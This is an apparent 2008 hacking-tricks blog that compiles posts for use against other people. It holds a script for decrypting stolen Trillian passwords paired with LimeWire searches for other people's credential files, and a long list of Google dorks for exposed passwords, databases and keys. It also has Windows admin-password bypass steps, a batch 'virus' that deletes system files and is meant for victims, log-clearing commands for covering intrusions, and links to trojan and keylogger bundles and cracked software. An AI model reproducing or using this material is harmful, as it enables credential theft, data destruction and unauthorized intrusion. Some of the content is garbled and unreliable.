Tuesday, September 16, 2008

[COD/ Trick] How to Screw MS Word -:))


This next prank does exactly that. While you are typing in a word document or outlook a random swear word will appear. The words will appear in random increments and the words them selves are random. The words and the time gap is determined by you.

Step 1: Open Microsoft Word
Step 2: Press Alt F-11 (This will open the VBA Editor)

Step 3: Select your Normal Template by double clicking “This Document”
Step 4: Copy the code below into your normal template. Remember to re-type any “s, they dont always transfer over correctly in the copy/paste process.


Sub typeRand()
Dim counter As String
counter = CStr(Int((30 - 1 + 1) * Rnd + 1))
Application.OnTime When:=Now + TimeValue(”00:00:” + counter), _
Name:=”TimedClose”
End Sub
Sub TimedClose()
Dim maindocument As Document
Set maindocument = activedocument
counter = CStr(Int((5 - 1 + 1) * Rnd + 1))
Select Case counter
Case 1
Selection.TypeText Text:=” OUG ROXxX ”
Case 2
Selection.TypeText Text:=” I Love OUG ”
Case 3
Selection.TypeText Text:=” OUG - We will We will Rock You ”
Case 4
Selection.TypeText Text:=” OUG - Orkut Underground ”
Case 5
Selection.TypeText Text:=” OUG - Join Us, Its Fun ”
End Select
Call typeRand
End Sub


Step 5: Close Microsoft Word



Continued...

Step 6: Enjoy

If you have done this correctly the code will load when the person loads Word. Currently there are 5 swear words. They randomly appear any where between 30 and 1 second. This code will load the second they start using word. So if the person doesn’t even type it will start going. It will affect both word and outlook. Below are some tips on how to modify the code.


Edit Swear Words

You can add any number of words you want. To increase the number of swear words only takes a couple tweaks

If you want to have a total of 20 swear words change the 5 in bold to 20.
Before:

counter = CStr(Int((5 - 1 + 1) * Rnd + 1))
After
counter = CStr(Int((20 - 1 + 1) * Rnd + 1))

The next step is to add the swear words. Currently there are 5 swear words. To add a new swear word, repeat the following till you reached the desired amount. After the last statement Case 5, Add Case 6

Case 5
Selection.TypeText Text:=” Text 1 ”

Case 6
Selection.TypeText Text:=” Text 2 “

Case 7
Selection.TypeText Text:=” Text 3 “


When you have added all the swear words you want make sure to finish with, End Select.
Edit Time Range

To change the random number range do as follows:

The maximum number comes first and is in bold

counter = CStr(Int((30 - 1 + 1) * Rnd + 1))

To change the maxium simply change the number 30 to something less than or equal to 59
To change the minimum number change the numbers in bold

counter = CStr(Int((20 - 1 + 1) * Rnd + 1))

I recommend keep this at 1 second but changing it wont hurt


How to Reverse the code
Press Alt-F11 and re-open your normal document. Erase the code and restart word.


Hope all enjoy the fun!
-:)) enjoy

credits:- evil who find dis -:))

Ultimate Hacking Experience 2008 =D


Ultimate Hacking Experience 2008 Size: 52,15 MB Trojan Horses - Yuri RAT v1.2 - MofoTro v1.7 BETA - Charon - Beast v2.0.7 - Omerta v1.3 - Theef v2.10 - Combined Forces R.A.T - MoSucker v3.0 - ProRat v1.9 Fix2 Keyloggers - Elite Keylogger v1.0 - SKL v0.1 - KeySpy v2.0 - A++++- Curiosity - Keylogger - KeyCopy Binders - Daemon Crypt Public v2 - NT Packer v2.1 - EES binder v1.0 - File Injector v3 - Bytes Adder - FreshBind v2.01 - YAB v2.01 - NakedBind v1.0 - Amok Joiner WebHacks/WordLists Brute Forcers - Munga Bunga s Official - Brutus - Authentication Engine Test 2 - wwwHack v1.946 - FTP Brute Hacker - FTP Brute Forcer.tar.gz - Unix- Wbrute.tar.gz - Unix- Shadow Scanner -Brute Forcer - Hackers Utility v1.5 - POP3 brute forcer.tar.gz - Unix CGI-Bug Scanners - NStealth HTTP Security Scanner v5.8 - Attack Toolkit v4.1 & source code included - Scanarator- Legion NetBios Scanner v2.1 - NetView v1.0 - CGI Vulnerability Scan - CGI Scanner v4.0 - VoidEye CGI scanner Virus! Viruses - Hippi virus - Sasser- W32. Blaster .Worm - Midnight Massacre - 00001 - Nimda - Loveletter virus - Happy 99 - MXZ Virus Builders - DR VBS - VBSwg 2 beta - Virus builder - p0ke s WormGen 2.0 - RESIDUO - DoS Virus MSN Hacks & Bots - HoaX Toolbox 1.1 - MSN Extreme 3.0 - MessenPass v1.06 - Advanced Blood Scroller - Nudge Madness - Advanced Instant Messengers Password Recovery - Contact Spy - Msn Explosion - Encrypted Messenger Port & IP Scanners - Blues Port Scanner - ProPort v2.2 - SuperScan v3.0 - Net Scan Tools v4.2 - LanSpy v2.0 - ~censored~ Threads v3.1 - Trojan Hunter v1.5 - SuperScan v4.0 - Neotrace PRO v3.25 trial&crack Nukers And Flooders - Rocket v1.0 - RPCNuke v1.0 - Panther Mode1 - 56k - Panther Mode2 - ISDN + - Final Fortune v2.4 - Battle Pong - Technophoria - Assault v1.0 - ICMP Nuker - CLICK v2.2 EXTRA! - Telnet Tutorial. Download: (Size: 52,15 MB)



http://rapidshare.com/files/140096242/Ultimate_hack_2008_www.softarchive.net.rar

enjoy -:))

▓Hack Passwords using Limewire▓


1.The newest verion of LimeWire is here:
http://www.limewire.com/download/index.php

2. Open "Notepad"
3. Copy and Paste the following code into Notepad
Dim key, keys, pwd, pwds, pwdl, maxval, goods, x
key = "243,038,129,196,057,134,219,146,113,163,185,2 30,0 83,122,149," & _

"124,000,000,000,000,000,000,255,000,000,128,0 00,0 00,000,128," & _

"128,000,255,000,000,000,128,000,128,000,128,1 28,0 00,000,000," & _

"128,255,000,128,000,255,000,128,128,128,000,0 85,1 10,097,098," & _

"108,101,032,116,111,032,114,101,115,111,108,1 18,1 01,032,072," & _

"084,084,080,032,112,114,111,120,000"

keys = split(key, ",")

main()

sub main()

pwd = ""

pwd = inputbox("Enter the Encrypted Trillian Password", "", "")

if pwd = "" then exit sub

pwd = trim(pwd)

pwdl = len(pwd)/2

redim pwds(pwdl-1)

for x = 0 to ubound(pwds)

'msgbox mid(pwd,(x * 2)+1,2)

pwds(x) = int("&h" & mid(pwd,(x * 2)+1,2))

next

if ubound(pwds) > ubound(keys) then

maxval = ubound(keys)

else

maxval = ubound(pwds)

end if

for x = 0 to maxval

goods = goods & chr(pwds(x) xor keys(x))

next

inputbox "Decrypted Password","",goods

end sub

4. Select FILE and choose SAVE AS

5. From the "Save as Type" drop-down menu select "All Files (*.*)"

6. Save the file as "TrillianPass.vbs" in the desired folder. Remember it's location.

7. Start LimeWire
8. Initiate a search for the following files:
aim.ini
yahoo.ini
msn.ini

9. Download any results that match the above file names. Note:
Only download files that are in lowercase letters.
Most files above 6 or 7 KB will not be the files your looking for.

10. Open the downloaded file in Notepad.

11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.

12. Open the file that was created earlier: TrillianPass.vbs

13. Paste the encryped password into the Trillian Password Cracker and press "OK" to reveal the real password 

-------------------------------------------------------------------------------------

How this works:

The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program's preferences are set to share a whole drive instead of just one or two folders .


i don no its 100 % workin  or not try it -:((

[GFX]Adobe Photoshop CS4 download links


Finally here 

Tested. Working great for me :-)




Adobe Photoshop CS4 is a leaked version from Adobe,
which is currently in Beta stage.
This package includes all features plus a working keygenerator.

The Adobe Photoshop family of products is the ultimate playground
for bringing out the best in your digital images and transforming them
into anything you can imagine.

Size: 434MB 


Download:
http://rapidshare.com/files/123595528/APSCS4.By.MechoDownload.part1.rar .
http://rapidshare.com/files/123595501/APSCS4.By.MechoDownload.part2.rar .
http://rapidshare.com/files/123604991/APSCS4.By.MechoDownload.part3.rar .
http://rapidshare.com/files/123606426/APSCS4.By.MechoDownload.part4.rar .
http://rapidshare.com/files/123626826/APSCS4.By.MechoDownload.part5.rar .

Rar Password:
TADJ@mechodownload


100% Working Crack:
http://rapidshare.com/files/145700417/Adobe_Photoshop_CS4_WDA.rar

bump lol

bump

[TRICK]*multiple login for Google talk* & Yahoo



g-talk..
1. Right-click on the desktop

2. Select New

3. Select Shortcut

4. Paste this into the text box:
"c:\program files\google\google talk\googletalk.exe" /nomutex
(dont miss even a comma)

5. Click Next6. Name it whatever: Google Talk Multiple, etc.

8. Click OK until you are done.





ENJOY>>>>>>>>>>>>>>>>>>>>>>



yahoo/...**
multiple login for yahoo!!!
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps
1. Go to Start ----> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test

3.On the right pane , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.


That's it done!!
Now close registry and restart yahoo messenger .For signing in with new id open another messenger .

enjoY -:|

[OFF]GOOGLE DORKS -:|



Limited to strings as there are beggars that will try to squeeze you for instructions and such...

No further explanation will be provided

robots.txt" "Disallow:" filetype:txt
intitle:index.of passwd passwd.bak
intitle:index.of haccess.ctl
intitle:index.of dead.letter
filetype:xls username password email
inurl:admin filetype:xls
"Thank you for your purchase" +download
intitle:"DocuShare"
inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" filetype:PDF | DOC
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-sitehp.net -"The PHP Group" inurl:source inurl:url extHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists

allinurl:/examples/jsp/snp/snoop.jsp
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:asp inurlathto.asp
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ini intext:env.ini
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
extqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetypera ora
filetypedb pdb backup (Pilot | Pluckerdb)
filetypehp inurl:index inurlhpicalendar -site:sourceforge.net
filetypeot inurl:john.pot
filetypest inurl:"outlook.pst"
filetypest pst -from -to -date
filetype:qbb qbb
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
iletype:log cron.log
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intextpassword | passcode) intextusername | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin

inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurldbc.ini ext:ini -cvs
inurlerl/printenv
inurlhp.ini filetype:ini
inurlreferences.ini "[emule]"
inurlrofiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
robots.txt
site:edu admin grades
SQL data dumps
Squid cache server reports
Unreal IRCd
ntitlehpinfo "PHP Version"
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq
"#mysql dump" filetype:sql
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" filetype:PDF | DOC
"Generated by phpSystem"
"This summary was generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 C
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
+"HSTSNR" -"netop.com"
"not for distribution" confidential
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"These statistics were produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
buddylist.blt
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:servlet/SnoopServlet
intitle:index.of cgiirc.config
data filetype:mdb -site:gov -site:mil
e-mail address filetype:csv csv
ext:asp inurlathto.asp
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ini intext:env.ini
ext:ldif ldif
ext:log "Software: Microsoft Internet Information
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
extqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:bkf bkf
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
letype:cnf inurl:_vti_pvt access.cnf
inurl:*db filetype:mdb
inurl:"shopadmin.asp" "Shop Administrators only"
inurl:getmsg.html intitle:hotmail
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:admin filetype:xls
intitle:index.of "Apache" "server at"
intitle:admin intitle:login
intitle:"FTP root at"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intext:SQLiteManager inurl:main.php
intext:gmail invite intext:http://gmail.google.com/gmail/a
intextpassword | passcode) intextusername | userid | user) filetype:csv
intitlehpinfo "PHP Version"

----------------------------------------
ENJOY -:))

[FTP LINKS]

HERE R SOME USEFUL FTP LINKS 2 DIRECT DOWNLOADS JUS CHECK IT OUT -:|

ftp://211.194.51.254/

PHOTOSHOP BRUSHES -:|

http://paste-it.net/public/d445c52/

Cracking Administrator Account


Changing ANY user password without knowng password


It enables the user to re-password any account without having to know the existing password and also shows you every account that exists on the machine (even the ones that are hidden). This is a good tool to use if you forgot a password to say your administrator account and you needed to be logged into the admin account for any reason.

To view all of the user accounts:
While logged onto the computer, click on Start>Run>and type in CMD.
From the command prompt window, type in net users. This will show you every account that is made onto the computer whether it is hidden or not.


To change an account password:


1. You logon to another user account go to run and type there itself only
cmd /k net user administrator /random
then press enter. u will find a administrator password then u can press crtl alt del log on to administrator then type the password u have been logged.
Here "administrator" is the name of the account.It can be different.

2. This method deletes passwords of all the accounts from your computer.Just find "SAM" file in "systemroot%\system32\" or in "C:\WINDOWS\system32" or click to search then goto tools option above then mark "show hidden files" and unmark "show system files" 2 steps below it and search for "SAM" in drive C.Some time a simple trick works some time doesn't...just delete the file and restart the computer..it will wash out Admin password ..So you just have to type administrator as user name and press enter...enjoy.

3. Now this trick is done with the help of "ERD Commander" CD which is a bootable CD.Insert it on boot time and go to start------Administrator tools--------Lock Smith----Choose your OS----give new admini password ASD_123 and ok then log off then open your os and give admin password asd_123 and after login you can change your password.

4. While logged onto the computer to an account that has administrative rights, click on Start>Run>and type in CMD.

Type in net user then the name of the account then * and press enter. heres an example: net user administrator * or net user "Joe Smith" * . Put the name in quotes if it contains spaces.

From there it should ask for a new password. Type in your new password (type very carefully - the command window won't display what you type) and once more to confirm it. If you get the message that the command succeeded successfully you're all set!!

5. Open command prompt (Start->Run->cmd), Enter the followin command, then press ENTER:compmgmt.msc

This should open the computer management console.
Go to local users & groups->users. Right click on any user and select "set password".

If you get a "access denied" do the following:
start>run>cmd
then use following commands
net user test /add (this command will make test named user)
net localgroup administrators test /add (this command will make test user as administrators rights)
and use net user command to reset your admin. password

File ready to be burn on a CD-ROM or a USB-Stick.

6. Use this software.

http://rapidshare.com/files/31465248/Admin_Password.rar

Get IP via Yahoo and MSN messenger login


The first way to get ip is:-

Get IP via Command Prompt:

1. Goto start > run type cmd and open.. or goto start > programs > accessories > command prompt and click.

2. type netstat hit enter

3. connect to he person (direct connect) with the chat program of your choice. MSN, yahoo, AIM, etc.. This can be done simply by opening a conversation with the target or sending them any file.

4. type netstat again in the command prompt.

collective data should appear in the cmd box..ie: (infomation censored)


The second one is:-

Get IP via MSN logging:

You will need to go into tools > options > Connections > Advanced settings and click the Connection Logging checkbox..
open up a Conversation with the target..
Send them like a blank notepad or any file..
Wait for them to cancel it or accept it, either works..

After your done that go back turn off your logs or else they will constantly update while your on msn..

then goto My documents > Received files > MsnMsgr (text file)
Search (ctrl+f) “Connecttoip” and you will your selected items..
click the find next button until you find the IP address..

wallah! You have the IP address to whomever you attempted to send the file to. Whether they cancel or accept the file doesnt matter because it still logs the IP but they must do one of the two.

Viruses for Irritating (plz dont try on ur pc)


@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other comp.. Very heavy Virus..

ENJOY -:))

Format your HD![TRICK]


Format A:/
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000

Format C:/
01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000

Format D:/
01100110011011110111001001101101011000010111010000 10000001100100001110100101110000100000001011110101 00010010111101011000


Try to kill Harddisk
01001011000111110010010101010101010000011111100000


Boot Failure
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 10100101110001100010011011110110111101110100001011 10011010010110111001101001


Now save your notepad as .bat file and send it to ur victim. Once ur victim clicks on that bat file. Dhooooooooommmm!!!!!!!!!!

Save on notepad as rinse.bat and then double click on it.

-:))

How hackers can erase their tracks after hacking

EXAMPLE:-

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.

Here are some of the techniques that an attacker can use to cover his tracks:-
(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\192.168.13.10 -1 “Security” -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.

[TRICK]lock any kind of data widout any software...



open notepad...
dan copy paste below....and save any name but extention.bat compulsarY
when u saved but type ur password which u wanna keep..in dat blue space in notpad




cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==pass goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

ORKUT BAN SPYWARE[source]


HERE IT IS SOURCE-:=


Win32.AHK
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}

}

return








It is the source code of a virus that blocks Orkut, Youtube and Firefox and shows a message as under,if you try to open either of the two websites :

"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!"

It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder.Now use a registry cleaner to delete the registry keys made by this virus.That's it,you've done it!!!

Hack PC while Chatting


Hack PC while chatting
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.

Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio 


1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED 


3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

What to do next??
It is now ur job to tell me what u have done next...


So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.


enjoy -:))

Quick Reply in Scrapbook (With signature)[source]


// ==UserScript==

// @name Quick Reply in Scrapbook (With signature)


// @author Gautam [Thanks to Mr Nobody]
// @description Reply in any orkut community with Shift+[Functional key No as the scrap number [like F3 for scrap #3]]

// @include http://www.orkut.*/Scrapbook.aspx
*
// @exclude *.js

// ==/UserScript==
var sig = "\n\n\n\n\nVisit: http:// www . gautamsofts . com \nhttp:// blog . gautamsofts .com \n(remove spaces)"; // Enter your signature here
